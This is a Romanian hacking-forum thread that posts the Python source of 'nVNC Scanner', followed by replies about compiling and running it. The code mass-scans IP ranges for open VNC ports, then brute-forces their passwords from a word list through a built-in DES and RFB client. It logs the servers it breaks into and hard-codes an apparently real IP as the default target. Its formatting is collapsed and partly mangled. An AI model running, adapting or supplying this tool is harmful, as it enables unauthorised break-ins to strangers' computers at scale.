"5900"DEFAULT_CONFIG['scan_timeout'] = "5"DEFAULT_CONFIG['scan_threads'] = "1000"DEFAULT_CONFIG['brute_threads'] = "500"DEFAULT_CONFIG['brute_timeout'] = "5"DEFAULT_CONFIG['auto_save'] = "true"DEFAULT_CONFIG['auto_brute'] = "true"#============DEFAULT_CONFIG============##============FILES============#FILES['results'] = {"folder": "output", "name":"results.txt"}FILES['ips'] = {"folder": "output", "name":"ips.txt"}FILES['passwords'] = {"folder": "input", "name":"passwords.txt"}FILES['config'] = {"folder": "nbin", "name":"config.conf"}FILES['ips.tmp'] = {"folder": "nbin", "name":"ips.tmp"}#============FILES============##============FOLDERS============#FOLDERS['output'] = "output"FOLDERS['input'] = "input"FOLDERS['nbin'] = "bin"#============FOLDERS============#class _baseDes(object): def __init__(self, mode=0, IV=None, pad=None, padmode=1): if IV: IV = self._guardAgainstUnicode(IV) if pad: pad = self._guardAgainstUnicode(pad) self.block_size = 8 if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if IV and len(IV) != self.block_size: raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") self._mode = mode self._iv = IV self._padding = pad self._padmode = padmode def getKey(self): """getKey() -> bytes""" return self.__key def setKey(self, key): """Will set the crypting key for this object.""" key = self._guardAgainstUnicode(key) self.__key = key def getMode(self): """getMode() -> pyDes.ECB or pyDes.1""" return self._mode def setMode(self, mode): """Sets the type of crypting mode, pyDes.ECB or pyDes.1""" self._mode = mode def getPadding(self): """getPadding() -> bytes of length 1. Padding character.""" return self._padding def setPadding(self, pad): """setPadding() -> bytes of length 1. Padding character.""" if pad is not None: pad = self._guardAgainstUnicode(pad) self._padding = pad def getPadMode(self): """getPadMode() -> pyDes.1 or pyDes.2""" return self._padmode def setPadMode(self, mode): """Sets the type of padding mode, pyDes.1 or pyDes.2""" self._padmode = mode def getIV(self): """getIV() -> bytes""" return self._iv def setIV(self, IV): """Will set the Initial Value, used in conjunction with 1 mode""" if not IV or len(IV) != self.block_size: raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") IV = self._guardAgainstUnicode(IV) self._iv = IV def _padData(self, data, pad, padmode): if padmode is None: padmode = self.getPadMode() if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if padmode == 1: if len(data) % self.block_size == 0: return data if not pad: pad = self.getPadding() if not pad: raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=2 or set the pad character.") data += (self.block_size - (len(data) % self.block_size)) * pad elif padmode == 2: pad_len = 8 - (len(data) % self.block_size) if sys.version_info[0] < 3: data += pad_len * chr(pad_len) else: data += bytes([pad_len] * pad_len) return data def _unpadData(self, data, pad, padmode): # Unpad data depending on the mode. if not data: return data if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if padmode is None: # Get the default padding mode. padmode = self.getPadMode() if padmode == 1: if not pad: pad = self.getPadding() if pad: data = data[:-self.block_size] + \ data[-self.block_size:].rstrip(pad) elif padmode == 2: if sys.version_info[0] < 3: pad_len = ord(data[-1]) else: pad_len = data[-1] data = data[:-pad_len] return data def _guardAgainstUnicode(self, data): if sys.version_info[0] < 3: if isinstance(data, unicode): raise ValueError("pyDes can only work with bytes, not Unicode strings.") else: if isinstance(data, str): try: return data.encode('ascii') except UnicodeEncodeError: pass raise ValueError("pyDes can only work with encoded strings, not Unicode.") return dataclass des(_baseDes): __pc1 = [56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3 ] __left_rotations = [ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ] __pc2 = [ 13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9, 22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1, 40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47, 43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 ] __ip = [57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7, 56, 48, 40, 32, 24, 16, 8, 0, 58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6 ] __expansion_table = [ 31, 0, 1, 2, 3, 4, 3, 4, 5, 6, 7, 8, 7, 8, 9, 10, 11, 12, 11, 12, 13, 14, 15, 16, 15, 16, 17, 18, 19, 20, 19, 20, 21, 22, 23, 24, 23, 24, 25, 26, 27, 28, 27, 28, 29, 30, 31, 0 ] __sbox = [ [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], # S3 [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], # S4 [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], # S5 [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], # S6 [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], # S7 [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], # S8 [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], ] __p = [ 15, 6, 19, 20, 28, 11, 27, 16, 0, 14, 22, 25, 4, 17, 30, 9, 1, 7, 23,13, 31, 26, 2, 8, 18, 12, 29, 5, 21, 10, 3, 24 ] __fp = [ 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25, 32, 0, 40, 8, 48, 16, 56, 24 ] ENCRYPT = 0x00 DECRYPT = 0x01 def __init__(self, key, mode=0, IV=None, pad=None, padmode=1): if len(key) != 8: raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") _baseDes.__init__(self, mode, IV, pad, padmode) self.key_size = 8 self.L = [] self.R = [] self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) self.final = [] self.setKey(key) def setKey(self, key): """Will set the crypting key for this object. Must be 8 bytes.""" _baseDes.setKey(self, key) self.__create_sub_keys() def __String_to_BitList(self, data): """Turn the string data, into a list of bits (1, 0)'s""" if sys.version_info[0] < 3: data = [ord(c) for c in data] l = len(data) * 8 result = [0] * l pos = 0 for ch in data: i = 7 while i >= 0: if ch & (1 << i) != 0: result[pos] = 1 else: result[pos] = 0 pos += 1 i -= 1 return result def __BitList_to_String(self, data): """Turn the list of bits -> data, into a string""" result = [] pos = 0 c = 0 while pos < len(data): c += data[pos] << (7 - (pos % 8)) if (pos % 8) == 7: result.append(c) c = 0 pos += 1 if sys.version_info[0] < 3: return ''.join([ chr(c) for c in result ]) else: return bytes(result) def __permutate(self, table, block): """Permutate this block with the specified table""" return list(map(lambda x: block[x], table)) def __create_sub_keys(self): """Create the 16 subkeys K[1] to K[16] from the given key""" key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) i = 0 self.L = key[:28] self.R = key[28:] while i < 16: j = 0 while j < des.__left_rotations[i]: self.L.append(self.L[0]) del self.L[0] self.R.append(self.R[0]) del self.R[0] j += 1 self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) i += 1 def __des_crypt(self, block, crypt_type): """Crypt the block of data through DES bit-manipulation""" block = self.__permutate(des.__ip, block) self.L = block[:32] self.R = block[32:] # Encryption starts from Kn[1] through to Kn[16] if crypt_type == des.ENCRYPT: iteration = 0 iteration_adjustment = 1 # Decryption starts from Kn[16] down to Kn[1] else: iteration = 15 iteration_adjustment = -1 i = 0 while i < 16: # Make a copy of R[i-1], this will later become L[i] tempR = self.R[:] # Permutate R[i - 1] to start creating R[i] self.R = self.__permutate(des.__expansion_table, self.R) # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here self.R = list(map(lambda x, y: x ^ y, self.R, self.Kn[iteration])) B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] j = 0 Bn = [0] * 32 pos = 0 while j < 8: m = (B[j][0] << 1) + B[j][5] n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] v = des.__sbox[j][(m << 4) + n] Bn[pos] = (v & 8) >> 3 Bn[pos + 1] = (v & 4) >> 2 Bn[pos + 2] = (v & 2) >> 1 Bn[pos + 3] = v & 1 pos += 4 j += 1 self.R = self.__permutate(des.__p, Bn) self.R = list(map(lambda x, y: x ^ y, self.R, self.L)) self.L = tempR i += 1 iteration += iteration_adjustment self.final = self.__permutate(des.__fp, self.R + self.L) return self.final def crypt(self, data, crypt_type): """Crypt the data in blocks, running it through des_crypt()""" if not data: return '' if len(data) % self.block_size != 0: if crypt_type == des.DECRYPT: raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") if not self.getPadding(): raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") else: data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() if self.getMode() == 1: if self.getIV(): iv = self.__String_to_BitList(self.getIV()) else: raise ValueError("For 1 mode, you must supply the Initial Value (IV) for ciphering") i = 0 dict = {} result = [] while i < len(data): block = self.__String_to_BitList(data[i:i+8]) if self.getMode() == 1: if crypt_type == des.ENCRYPT: block = list(map(lambda x, y: x ^ y, block, iv)) processed_block = self.__des_crypt(block, crypt_type) if crypt_type == des.DECRYPT: processed_block = list(map(lambda x, y: x ^ y, processed_block, iv)) iv = block else: iv = processed_block else: processed_block = self.__des_crypt(block, crypt_type) result.append(self.__BitList_to_String(processed_block)) i += 8 if sys.version_info[0] < 3: return ''.join(result) else: return bytes.fromhex('').join(result) def encrypt(self, data, pad=None, padmode=None): data = self._guardAgainstUnicode(data) if pad is not None: pad = self._guardAgainstUnicode(pad) data = self._padData(data, pad, padmode) return self.crypt(data, des.ENCRYPT) def decrypt(self, data, pad=None, padmode=None): data = self._guardAgainstUnicode(data) if pad is not None: pad = self._guardAgainstUnicode(pad) data = self.crypt(data, des.DECRYPT) return self._unpadData(data, pad, padmode)class RFBProtocol: def __init__(self, host="69.193.118.223", password="1212", port=5901, timeout=5, shared=1): self.host = str(host) self.port = int(port) self.password = str(password) self.timeout = float(timeout) self.shared = int(shared) self.sock = None self.connected = False self.RFB = False self.null = False self.version = None self.name = None self.fail_message = None def connect(self): try: self.conn_init() self.client_auth() except Exception as ex: pass def close(self): self.sock.close() def conn_init(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.connect((self.host, self.port)) result = self.sock.recv(12) if result[:3] == "RFB": self.RFB = True self.sock.send("RFB 003.003\n") else: raise Exception("Not RFB") def client_auth(self): result = self.sock.recv(4) (method,) = unpack("!I", result) if method == 0: (lenght,) = unpack("!I", self.sock.recv(4)) self.fail_message = self.sock.recv(int(lenght)) raise Exception(self.fail_message) elif method == 1: self.null = True self.client_init() elif method == 2: self.vnc_auth() else: raise Exception("Unsupported auth method") def vnc_auth(self): challenge = self.sock.recv(16) self.send_password(challenge) (result,) = unpack("!I", self.sock.recv(4)) self.status_code = result if result == 0: self.client_init() elif result == 1: raise Exception("WRONG PASSWORD") def client_init(self): self.connected = True self.sock.send(pack("!B", self.shared)) result = self.sock.recv(24) (width, height, pixformat, namelen) = unpack("!HH16sI", result) self.name = self.sock.recv(namelen) def send_password(self, challenge): password = (self.password + '\0' * 8)[:8] response = self.des_enc(password, challenge) self.sock.send(response) def des_enc(self, key, string): newkey = [] for ki in range(len(key)): bsrc = ord(key[ki]) btgt = 0 for i in range(8): if bsrc & (1 << i): btgt = btgt | (1 << 7-i) newkey.append(chr(btgt)) DES = des("".join(newkey)) return DES.encrypt(string)class MiscFunctions: def is_int(self, string): try: int(string) return True except ValueError: return False def is_float(self, string): try: float(string) return True except ValueError: return False def is_bool(self, string): if string.lower() in ("true", "false"): return True else: return False def save_config(self): Files.file_write(FILES['config'], pickle.dumps(CONFIG))class FilesHandler: def __init__(self): self.sep = os.sep self.root_path = os.getcwd() + self.sep def file_get_contents(self, location): if self.file_exists(location): return open(location).read() else: return False def file_write(self, location, data="", mode="w"): if mode=="i": oldf = open(location).read() f = open(location, 'w') f.write(data.rstrip() + '\n' + oldf.rstrip()) f.close() else: f = open(location, mode) f.write(data) f.close() def file_empty(self, location): try: if os.path.getsize(location) > 0: return False else: return True except OSError: return True def file_exists(self, file_path): return os.path.isfile(file_path) def dir_exists(self, dir_path): if os.path.exists(dir_path) and (not os.path.isfile(dir_path)): return True else: return False def dirname(self, path): return os.path.dirname(path) def mkdir(self, path): try: os.makedirs(path) except OSError: passlistclass Deploy: def __init__(self): self.deploy_folders() self.deploy_files() def deploy_folders(self): for (key, folder) in FOLDERS.items(): folder = Files.root_path + folder + Files.sep FOLDERS[key] = folder if not Files.dir_exists(folder): Files.mkdir(folder) def deploy_files(self): for (key, file) in FILES.items(): file = FOLDERS[file['folder']] + file['name'] FILES[key] = file if not Files.file_exists(file): Files.file_write(file) if Files.file_empty(FILES['config']): Files.file_write(FILES['config'], pickle.dumps(DEFAULT_CONFIG)) if Files.file_empty(FILES['passwords']): Files.file_write(FILES['passwords'], DEFAULT_PASSWORDS)class Display: def __init__(self): pass def delimiter(self, string): stdout.write("\n" + ("-" * len(string)) + "\n") def getTerminalSize(self): current_os = os.name tuple_xy=None if current_os in ('nt','dos','ce'): tuple_xy = self._getTerminalSize_windows() if tuple_xy is None: tuple_xy = self._getTerminalSize_tput() if current_os == 'posix': tuple_xy = self._getTerminalSize_linux() if tuple_xy is None: tuple_xy = (80, 25) return tuple_xy def _getTerminalSize_windows(self): res=None try: from ctypes import windll, create_string_buffer h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) except: return None if res: import struct (bufx, bufy, curx, cury, wattr, left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) sizex = right - left + 1 sizey = bottom - top + 1 return sizex, sizey else: return None def _getTerminalSize_tput(self): try: import subprocess proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) output=proc.communicate(input=None) cols=int(output[0]) proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) output=proc.communicate(input=None) rows=int(output[0]) return (cols,rows) except: return None def _getTerminalSize_linux(self): def ioctl_GWINSZ(fd): try: import fcntl, termios, struct, os cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234')) except: return None return cr cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) if not cr: try: fd = os.open(os.ctermid(), os.O_RDONLY) cr = ioctl_GWINSZ(fd) os.close(fd) except: pass if not cr: try: cr = (env['LINES'], env['COLUMNS']) except: return None return int(cr[1]), int(cr[0]) def posvals(self,val='x'): self.size = self.getTerminalSize() self.tx = self.size[0] self.ty = self.size[1] if val=='x': return self.tx else: return self.ty def clearscreen(self): if os.name in ("nt", "dos", "ce"): os.system("CLS") elif os.name == "posix": os.system("clear") else: stdout.write("\n"*150) self.banner() def banner(self): banner = list() banner.append("|>>>> - nVNC Scanner - %s - %s - <<<<|" % (VERSION, CODENAME)) banner.append("Scan Threads: %s <-> Scan Timeout: %s <-> Scan Port: %s" % (CONFIG['scan_threads'], CONFIG['scan_timeout'], CONFIG['scan_port'])) banner.append("Brute Threads: %s <-> Brute Timeout: %s <-> Auto Brute: %s" % (CONFIG['brute_threads'], CONFIG['brute_timeout'], CONFIG['auto_brute'])) banner.append("Scan Range: %s <-> Auto Save: %s" % (CONFIG['scan_range'], CONFIG['auto_save'])) stdout.write("\n") for line in banner: stdout.write(line.center(self.posvals())) if 'nVNC' in line: stdout.write('\n') stdout.write("\n\n") def disclaimer(self): for line in DISCLAIMER.split('\n'): stdout.write(line.center(self.posvals()))class NetTools: def convert_ip(self, string): if self.is_ip(string.strip()): return [self.ip2int(string.strip())] else: return False def convert_range(self, string): if string.count('-') == 1: string = string.strip().split('-') if self.is_ip(string[0]) and self.is_ip(string[1]): string = [self.ip2int(x) for x in string] string.sort() return string elif string.count('*') in (1,2,3): if self.is_ip(string.replace('*', '0')): return [self.ip2int(string.replace('*', '0')), self.ip2int(string.replace('*', '255'))] else: return False def is_range(self, string): if string.count('-') == 1: string = string.strip().split('-') if self.is_ip(string[0]) and self.is_ip(string[1]): return True elif string.count('*') in (1,2,3): if self.is_ip(string.replace('*', '0')): return True else: return False def is_ip(self, address='0.0.0.0'): try: octets = address.split('.') if len(octets) == 4: ipAddr = "".join(octets) if ipAddr.isdigit(): if (int(octets[0]) >= 0) and (int(octets[0]) <= 255): if (int(octets[1]) >= 0) and (int(octets[1]) <= 255): if (int(octets[2]) >= 0) and (int(octets[2]) <= 255): if (int(octets[3]) >= 0) and (int(octets[3]) <= 255): return True except IndexError: pass except ValueError: pass return False def ip2int(self, ip): ip = ip.split(".") return int("%02x%02x%02x%02x" % (int(ip[0]),int(ip[1]),int(ip[2]),int(ip[3])),16) def int2ip(self, integer): integer = "%08x" % (integer) return "%i.%i.%i.%i" % (int(integer[0:2],16),int(integer[2:4],16),int(integer[4:6],16),int(integer[6:8],16))class Interface: def Start(self): self.main_console().cmdloop() class main_console(cmd.Cmd): prompt = ("+>").rstrip() ruler = "~" def default(self, line): stdout.write("\n\tNope.\n\n") #==========MISC COMMANDS==========# def do_disclaimer(self, line): Display.disclaimer() def do_add(self, line): line = line.lower().split(" ") if len(line) == 2 and line[0] and line[1]: if line[1] in FILES.keys(): Files.file_write(FILES[line[1]], line[0], 'i') stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n") else: stdout.write("\n\t[ERROR]\n") time.sleep(0.5) Display.clearscreen() def do_flush(self, line): line = line.lower().split(" ") if len(line) == 1 and line[0]: if line[0] in FILES.keys(): Files.file_write(FILES[line[0]]) stdout.write("\n\t[OK]\n") elif line[0].strip() in ("all", "everything"): for file in FILES.keys(): if file != "config": Files.file_write(FILES[file]) stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n") time.sleep(0.5) Display.clearscreen() def do_clear(self, line): Display.clearscreen() def do_cls(self,line): self.do_clear(line) def do_exit(self, line): sys.exit("Bye.") def do_quit(self, line): self.do_exit(line) def do_q(self, line): self.do_exit(line) #==========MISC COMMANDS==========# #==========SCAN COMMAND===========# def do_scan(self, line): line = line.lower().split(" ") if len(line) == 1 and line[0] != "": if NetTools.is_range(line[0]): stdout.write("\n\t[OK]\n") CONFIG['scan_range'] = line[0] else: stdout.write("\n\t[ERROR]\n") stdout.write("\n") ScanEngine.Start() #==========SCAN COMMAND===========# #==========BRUTE COMMAND===========# def do_brute(self, line): stdout.write("\n") BruteEngine.Start() #==========BRUTE COMMAND===========# #==========SET COMMAND===========# def do_set(self, line): OK = False line = line.lower().split(" ") if len(line) == 2 and line[0] in CONFIG.keys(): if line[0] == "scan_range" and NetTools.is_range(line[1]): OK = True elif line[0] in ("scan_threads", "brute_threads", "scan_port") and Misc.is_int(line[1]): OK = True elif line[0] in ("scan_timeout", "brute_timeout") and Misc.is_float(line[1]): OK = True elif line[0] in ("auto_brute", "auto_save") and Misc.is_bool(line[1]): OK = True if OK: CONFIG[line[0]] = line[1] stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n\n") else: stdout.write("\n\t[ERROR]\n\n") if CONFIG['auto_save'] == "true": Misc.save_config() time.sleep(0.5) Display.clearscreen() #==========SET COMMAND===========# #==========SHOW COMMAND===========# def do_show(self, line): line = line.lower() if line in ("results", "result", "brute"): stdout.write("\nBrute Results") Display.delimiter("Brute Results") for line in open(FILES['results'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Brute Results") elif line in ("ips", "scan", "ip"): stdout.write("\nScan Results") Display.delimiter("Scan Results") for line in open(FILES['ips'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Scan Results") elif line in ("password", "passwords", "pass"): stdout.write("\nPasswords") Display.delimiter("Passwords") for line in open(FILES['passwords'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Passwords") else: stdout.write("\nSettings") Display.delimiter("Settings") for (config, value) in CONFIG.items(): stdout.write("%s = %s\n" % (config, value)) Display.delimiter("Settings") stdout.write("\n") #==========SHOW COMMAND===========#class ScanEngine: def __init__(self): pass def init(self): global lock, semaphore lock = threading.Lock() semaphore = threading.Semaphore(int(CONFIG['scan_threads'])) self.ips_file = open(FILES['ips'], 'a', 0) self.current = 0 self.found = 0 self.range = NetTools.convert_range(CONFIG['scan_range']) self.total = int(self.range[1]) - int(self.range[0]) def Start(self): self.init() output_thread = threading.Thread(target=self.output_thread, args=()) output_thread.daemon = True output_thread.start() try: integer = self.range[0] while integer <= self.range[1]: semaphore.acquire() thread = threading.Thread(target=self.scan_thread, args=(integer,)) thread.daemon=True thread.start() integer += 1 self.current += 1 except: stdout.flush() stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n") while threading.active_count() > 1: pass self.ips_file.close() if CONFIG['auto_brute'] == "true": BruteEngine.Start() else: stdout.write("\n\nDONE! Check \"output/ips.txt\" or type \"show ips\"!\n\n") def scan_thread(self, integer): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(float(CONFIG['scan_timeout'])) sock.connect((NetTools.int2ip(integer), int(CONFIG['scan_port']))) lock.acquire() self.found += 1 self.ips_file.write("%s:%i\n" % (NetTools.int2ip(integer), int(CONFIG['scan_port']))) lock.release() except: pass semaphore.release() def output_thread(self): try: while self.total >= self.current: time.sleep(0.5) stdout.flush() stdout.write("\r Current [%i/%i] Found: %i " % (self.current, self.total, self.found)) except: passclass BruteEngine: def __init__(self): pass def init(self): global lock, semaphore lock = threading.Lock() semaphore = threading.Semaphore(int(CONFIG['brute_threads'])) self.results = open(FILES['results'], 'a', 0) self.passwords = list() self.servers = list() self.current_password = None self.output_kill = False self.get_passwords() self.get_servers() def Start(self): self.init() if self.passwords is not False: if self.servers is not False: output_thread = threading.Thread(target=self.output_thread, args=()) output_thread.daemon = True output_thread.start() for self.current_password in self.passwords: try: for server in self.servers: semaphore.acquire() thread = threading.Thread(target=self.brute_thread, args=( server, self.current_password )) thread.daemon=True thread.start() except: stdout.flush() stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n") while threading.active_count() > 2: pass self.output_kill = True self.results.close() stdout.write("\n\nDONE! Check \"output/results.txt\" or type \"show results\"!\n\n") else: stdout.write("\n\tThere are no scanned ips.\n") else: stdout.write("\n\tThere are no passwords.\n") def brute_thread(self, server, password): try: rfb = RFBProtocol(server[0], password, server[1], CONFIG['brute_timeout']) rfb.connect() rfb.close() lock.acquire() if rfb.RFB: if rfb.connected: self.servers.pop(self.servers.index(server)) if rfb.null: password = "null" self.results.write("%s:%i-%s-[%s]\n" % (str(server[0]), int(server[1]), password, rfb.name)) stdout.flush() stdout.write("\r[*] %s:%i - %s \n\n" % (str(server[0]), int(server[1]), password)) lock.release() except KeyboardInterrupt: return except: pass semaphore.release() def output_thread(self): while not self.output_kill: try: if self.current_password != None: stdout.flush() stdout.write("\r Trying \"%s\" on %i servers " % (self.current_password, len(self.servers))) time.sleep(0.2) except: pass def get_passwords(self): if not Files.file_empty(FILES['passwords']): for line in open(FILES['passwords'], 'r').readlines(): if line.strip != "": self.passwords.append(line.strip()) else: self.passwords = False def get_servers(self): if not Files.file_empty(FILES['ips']): for line in open(FILES['ips'], 'r').readlines(): if line.count(":") == 1: line = line.strip().split(":") if NetTools.is_ip(line[0]) and Misc.is_int(line[1]): self.servers.append([line[0], int(line[1])]) elif NetTools.is_ip(line.strip()): self.servers.append([line.strip(), CONFIG['scan_port']]) else: self.servers = Falseclass MainEngine: def __init__(self): global Files, NetTools, Deploy, Display, Interface, ScanEngine, BruteEngine, Misc Files = FilesHandler() NetTools = NetTools() Deploy = Deploy() Misc = MiscFunctions() Display = Display() ScanEngine = ScanEngine() BruteEngine = BruteEngine() Interface = Interface() def Start(self): self.load_config() Display.clearscreen() Interface.Start() def load_config(self): global CONFIG CONFIG = pickle.load(open(FILES['config']))if __name__ == "__main__": try: MainEngine = MainEngine() MainEngine.Start() except KeyboardInterrupt: if CONFIG['auto_save'] == "true": Misc.save_config() sys.exit("\n\n\t...Exiting...\n")Source: TF.comA fost postat programul compilat, aici este doar sursaUnde gasesc programul compilat? Quote
Gio33 Posted November 12, 2014 Report Posted November 12, 2014 PyInstallerrespectivFrontPage - py2exe.orgGood luck. Quote
awnly3jhc2g Posted November 12, 2014 Report Posted November 12, 2014 I-as da like si la like-ul lui @Elohim, lol Quote
cafeaneagra Posted November 21, 2014 Report Posted November 21, 2014 merge rulat pe linux nVnc? Quote
ratzuca Posted December 3, 2014 Report Posted December 3, 2014 e doar un python cum sa nu mearga Quote
sudo Posted December 3, 2014 Report Posted December 3, 2014 @ratzuca si de asta ti-ai facut tu cont? Quote
ratzuca Posted December 3, 2014 Report Posted December 3, 2014 sincer nu, doar privesc cum devin unii infractori fara sa vor, si imi place . sa intri neautorizat in pc-u altuia e o infractiune asa cred eu Quote
irodica Posted April 28, 2015 Report Posted April 28, 2015 Salut! Am vazut ca a.ti postat o sursa pentru un scanner NVNC si am incercat cum a.ti sugerat sa il compilez prin Python, m.am interesat cum sa folosesc programul dar imi da o eroare la linia 899 si imi spune ca ceva nu este scris bine. Files.file_write(FILES[line[0]]) Este prima data cand folosesc acest program sau sa compilez ceva de aceea nu imi pot da seama unde este aceea greseala. v.asi fi foarte recunoscator daca m.ati putea ajuta.Multumesc! Quote
BogdanNBV Posted April 28, 2015 Report Posted April 28, 2015 Salut! Am vazut ca a.ti postat o sursa pentru un scanner NVNC si am incercat cum a.ti sugerat sa il compilez prin Python, m.am interesat cum sa folosesc programul dar imi da o eroare la linia 899 si imi spune ca ceva nu este scris bine. Files.file_write(FILES[line[0]]) Este prima data cand folosesc acest program sau sa compilez ceva de aceea nu imi pot da seama unde este aceea greseala. v.asi fi foarte recunoscator daca m.ati putea ajuta.Multumesc!nVNC a fost scris in Python 2.7, tare am impresia ca tu ti-ai instalat Python 3.x.Python nu "compileaza" nimic.Mai repeta putin limba romana. Quote
irodica Posted May 10, 2015 Report Posted May 10, 2015 Imi cer scuze pentru un reply asa de intarziat. Iti multumesc pentru sfat, in legatura cu limba romana nu am fost la o scoala in Romania, limba mea de baza nu este romana vorbesc si scriu doar ce am invatat de la unul din pariti. Va multumesc si imi cer scuze pentru neintelegi. 1 Quote
